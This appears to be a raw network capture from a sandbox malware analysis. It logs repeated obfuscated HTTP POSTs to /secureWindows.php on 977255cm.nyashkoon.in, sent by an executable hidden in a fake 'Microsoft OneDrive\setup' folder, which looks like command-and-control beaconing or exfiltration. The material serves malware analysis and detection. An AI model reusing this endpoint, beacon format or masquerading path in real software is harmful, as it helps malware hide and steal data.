                                                        Oct 30, 2024 05:24:00.678414106 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:00.965150118 CET | 785 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:00 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRGYA0wKdJOkl1nE0mjONhzyxGJwzqoCWqMoD1W2HUcLa6sCrMUSw9h3cZ2JQNKuHikaItH%2FTqd68wI7JGH7BMuA%2FZIGQmqkfDqWX8yzbOulKDtS5vMP31soqj6ora%2FRc8BNpySZj2k%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a21be82e2c9d-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1601&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=929993&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        135 | 192.168.2.4 | 50138 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:01.727804899 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:02.074203968 CET | 1076 | OUT | Data Raw: 57 5e 5c 5c 55 5f 56 57 58 57 50 59 55 5c 5b 5b 54 5b 5c 54 59 54 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\\U_VWXWPYU\[[T[\TYTZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[- -<82$[;. _%>0X;:;":&#(%'!- F$,Z*5
                                                        Oct 30, 2024 05:24:02.324040890 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:02.534905910 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:02 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rKhMm56UjaE0o1bT28joCY6N9qp4HpJPDt4%2FtXslDTTS57y3SxqmEf4nVJo%2FINZZsJWrmFe9oiP4Mv9UGTgWotBjZiHWPDWGEimOdrjOGq0euP%2FQESWPAsZ1coxJH5nKU8r6pOIT3fo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a2262b9e6b79-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1019&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1476044&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        136 | 192.168.2.4 | 50139 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:02.661389112 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:03.012001991 CET | 1076 | OUT | Data Raw: 52 54 59 52 55 5a 56 56 58 57 50 59 55 5e 5b 5d 54 58 5c 58 59 5d 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RTYRUZVVXWPYU^[]TX\XY]ZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[8>^(;"\0>;@96<\%<-)?4#\%(<&)]&8.: F$,Z*=
                                                        Oct 30, 2024 05:24:03.256624937 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:03.449671984 CET | 796 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mXTH8dWGt0TQhn56nAZh%2Fh77mPKHFrXfgF4tM5Dqa1UoDwSjQ5%2Fwpy%2BOxAeqSLiQRTeeQwdQ5UuQ73aiV%2F7VdoFS7aeS%2FeL1ukLEqsvI%2FKhFWfnBlcWO%2BDmcBHUM8wsoftiBA4al%2BKU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a22bfd0d475b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1074&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1278022&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        137 | 192.168.2.4 | 50140 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:03.577465057 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:03.990916014 CET | 1076 | OUT | Data Raw: 57 56 5c 5d 55 59 53 50 58 57 50 59 55 5c 5b 5c 54 5b 5c 5b 59 53 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WV\]UYSPXWPYU\[\T[\[YSZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,&=893>89%&;/)( :+Z&#)%"'8:9 F$,Z*5


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        138 | 192.168.2.4 | 50141 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:04.159600973 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:04.511727095 CET | 1340 | OUT | Data Raw: 52 50 5c 5d 55 54 53 57 58 57 50 59 55 5f 5b 5b 54 59 5c 5c 59 50 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RP\]UTSWXWPYU_[[TY\\YPZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,0<"';D:+&'/ \7:2)3<:385- F$,Z*
                                                        Oct 30, 2024 05:24:04.757013083 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:04.967663050 CET | 940 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ir8geoBF6CMTIv%2B9FtGTjIowo45urS7jmlNL0X7bt9lt37Zht2EeWrhdWmUzUSX4DAjWv2qGZU1kcMqk4RGQO06XE%2FGbVzk9%2BC%2FoBFSpbCbdptx%2BfoddfwtXoj2PhL%2FIMEoQT80EK6I%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a2356c83464a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1768&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=785675&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 13 2b 16 01 0f 25 0a 26 5b 3c 3c 00 07 3d 2e 0c 5d 24 1f 02 15 31 05 2e 5a 2a 3b 05 58 3e 42 24 5a 3f 32 23 00 34 26 33 02 3e 01 2f 46 0c 10 24 01 26 22 33 52 3f 55 2d 58 3d 3b 38 05 23 1e 31 05 3e 00 2c 0e 36 0a 37 07 26 31 3e 1e 38 2d 3e 54 2d 1b 21 01 2d 23 09 0d 2a 2a 21 57 08 14 21 03 31 02 01 16 32 2d 38 5f 26 1c 2e 11 37 01 01 5c 36 2b 35 03 28 2b 09 0d 25 20 12 12 30 55 30 0f 25 5f 3c 15 2b 21 02 0c 27 23 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&+%&[<<=.]$1.Z*;X>B$Z?2#4&3>/F$&"3R?U-X=;8#1>,67&1>8->T-!-#**!W!12-8_&.7\6+5(+% 0U0%_<+!'#"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        139 | 192.168.2.4 | 50142 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:04.296758890 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:04.652276039 CET | 1076 | OUT | Data Raw: 57 53 5c 54 55 5f 56 5d 58 57 50 59 55 5e 5b 58 54 58 5c 5a 59 54 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\TU_V]XWPYU^[XTX\ZYTZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%;2_=+>'=E-6 1=/[7*?Y2*<<5)'85Y-: F$,Z*=
                                                        Oct 30, 2024 05:24:04.902230978 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:05.107672930 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RzejTsXHRpc%2Br3OlNxn%2BGkMzaWH6O%2FLqujaIC3T71YPRVavDXvHqXyGequ8TBs5OPvAhPSz0p6paQbWqfgQmESj7yIex%2BXLWO68sxJGmNesh7xhO9TGB8FPJgG7ZCM7jHmcScHc7WQs%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a2364c362cda-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1377&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1078986&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        140 | 192.168.2.4 | 50143 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:05.231933117 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:24:05.590154886 CET | 1076 | OUT | Data Raw: 57 5e 59 50 55 58 56 51 58 57 50 59 55 5a 5b 5c 54 5a 5c 5b 59 55 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^YPUXVQXWPYUZ[\TZ\[YUZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/32X+^13>'E:C#&-,/*#(19/]($:: F$,Z*-
                                                        Oct 30, 2024 05:24:05.836293936 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:06.040776968 CET | 794 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mWwznJ97VC909ntrruW%2B2Gl7SXR%2BQ5mY5okrvaR9tywNe1wMpeR9Zpu2zXsBv4sbn%2Ff3M5%2BbRzp%2FhiBShwoSQ%2BceCRHsUuPB%2BJS1FGMwfdxheN4qxqcUgeW4ImUAKqv7qBicSl4tixc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a23c1bcd2847-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1347&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1144664&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        141 | 192.168.2.4 | 50144 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:06.175977945 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:06.527570963 CET | 1076 | OUT | Data Raw: 52 52 59 55 55 5c 56 52 58 57 50 59 55 5e 5b 53 54 52 5c 5d 59 5c 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RRYUU\VRXWPYU^[STR\]Y\Z^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/0=<9$>8,%/1-/##X&'(69['^*/: F$,Z*=
                                                        Oct 30, 2024 05:24:06.771384001 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:06.966308117 CET | 790 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BC5xJm1oDjg3%2FSINThje083xHX07sHxw4rlf%2BVUtszBbryCyCC6%2FH0CFyueQBfRIj4m3PPj9YjWS0tUH%2FSmYvJREBbzklHEJ1y47LSogoYnJGbKV1ft%2BAaWsGPGW5n0O3R0FdWWksI4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a241fe37e70e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1549&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1082212&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        142 | 192.168.2.4 | 50145 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:07.090485096 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:07.452671051 CET | 1076 | OUT | Data Raw: 57 5f 5c 53 50 5e 53 51 58 57 50 59 55 5f 5b 5c 54 58 5c 5d 59 53 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_\SP^SQXWPYU_[\TX\]YSZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[/0Y((*]$/D-7$-#,*<Y4 1:+\?%:&;9.: F$,Z*
                                                        Oct 30, 2024 05:24:07.679929972 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:07.894293070 CET | 791 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y4ZVoPTjXVZ8E2nh9%2BVb%2FZyujHlOTaE1ofCOs1Qv7EY2%2BZrgc9%2F1ifu%2BkT2Lh6o3KE5l8JR%2FI47ugxT1P8OOFVlViHKIWR6M1InNfIEwe1hDIw2UopvqEqkfd1o5m5Z0S2fGACh2tCM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a247aff7b78d-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1335&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1054624&cwnd=67&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        143 | 192.168.2.4 | 50146 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:08.015168905 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:08.371186018 CET | 1076 | OUT | Data Raw: 57 56 59 50 55 5c 53 56 58 57 50 59 55 5b 5b 5c 54 58 5c 5f 59 50 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WVYPU\SVXWPYU[[\TX\_YPZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[80%?.]'?.&<&8_/8] '[2Y<5:3+:. F$,Z*)
                                                        Oct 30, 2024 05:24:08.613293886 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:24:08.930634975 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:24:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIoi7lf5f6X%2FSkbQNgqoep1rf8NrJSo9PjyAb5bK3wMS9RlN7HQd3ePHlEAT%2FCWGKIPcCoq12wcn1ck2s1ZrNX5V0jz7VVEi0%2FEoSWw%2BwijIvba4SADCAjrxFLsmcovzLeTuexHkC74%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a24d7999e524-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1107&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1230246&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        144 | 192.168.2.4 | 50147 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:09.059138060 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
